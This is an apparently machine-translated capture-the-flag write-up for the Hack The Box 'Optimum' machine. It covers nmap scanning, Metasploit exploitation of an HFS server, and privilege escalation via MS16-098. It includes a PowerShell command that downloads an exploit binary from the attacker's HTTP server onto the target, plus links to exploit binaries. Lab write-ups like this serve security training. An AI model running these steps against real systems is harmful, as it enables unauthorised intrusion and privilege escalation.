Hack the box optimum

First open the range , direct nmap Open a sweep .

nmap -sV -Pn -A 10.10.10.8

Through the scanning results, it is known that 80 port ,80 The port ran away HFS service . Go with the trend msf Search for HFS What are the loopholes

search hfs

Use the following hfs The order of , Then look at what to configure

use 1
options

The remote host needs to be configured , Local host , Good configuration ,run. many run A few times , The first few times are easy to fail , It will take a long time .

set RHOSTS 10.10.10.8
set LHOSTS 10.10.14.17
run

After successful use , return meterpreter. Then look at the files in the current folder . Can see user Of flag

It can be read directly user.txt.txt Or enter shell, Read user.txt.txt

# Direct reading 
cat user.txt.txt

Then keep looking , See if you can enter administrator Folder , Find that you can't , And you can't create new users .


Want to use it directly msf The right to raise , But you don't get permission after execution . So how should we raise the right ？ See what patches have been made .systeminfo It can still be implemented .

After getting this information , Use Windows-Exploit-Suggester Script comparison , Look at the breakthrough point .（ I can't even run this script in this place , say xlrd Report errors , This script uses python2 Written , Attention, everyone .）
The address is https://git Hab .com/AonCyberLabs/Windows-Exploit-Suggester. See how to use readme Just go . Remember it was python2 And install xlrd.

Will be far away systeminfo Copy the information , Then use the following command to compare

python2 windows-exploit-suggester.py --database 2021-04-21-mssb.xls --systeminfo sysinfo.txt

The comparison results show that MS16–098 Raise the right . You can use this link to get the right to raise exe.

https://git Hab .com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

After downloading , stay exe Start a local... Folder http The server

python3 -m http.server 888

Then at the end of the target plane shell Execute the following command in

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:888/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

This command means to download 10.10.14.17 above 41020.exe, Then put it under the back position .

Find... In the corresponding position , And then execute 41020.exe, Get the highest authority smoothly

Go to the users/administrator/desktop Now get root.txt, Get it done .

Postscript ： Find out what's ahead users.txt It's not hard to , However, in the later process of raising rights, it involves python2 Environment and so on , so much trouble . especially Windows-Exploit-Suggester Script execution was unsuccessful , I made a direct reference to other people's content , You can try it yourself . special kali It doesn't seem to bring pip2, You can refer to the following links .

Reference link
https://ranakhalil101.medium.com/hack-the-box-optimum-writeup-w-o-metasploit-3a912e1c488c
pip2 The installation link can refer to ：
https://www.cnblogs.com/lzkalislw/p/15579620.html